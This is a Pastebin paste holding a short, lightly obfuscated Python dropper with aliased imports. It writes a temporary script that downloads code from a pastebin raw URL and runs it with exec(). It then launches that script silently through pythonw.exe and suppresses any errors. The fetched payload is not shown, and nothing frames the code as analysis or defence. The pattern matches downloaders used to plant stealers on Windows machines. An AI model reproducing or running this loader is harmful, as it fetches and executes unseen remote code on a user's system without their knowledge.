Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from tempfile import NamedTemporaryFile as _ffile
- from sys import executable as _eexecutable
- from os import system as _ssystem
- _ttmp = _ffile(delete=False)
- _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('https://pastebin.com/raw/1aTrjG8D').read())""")
- _ttmp.close()
- try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
- except: pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement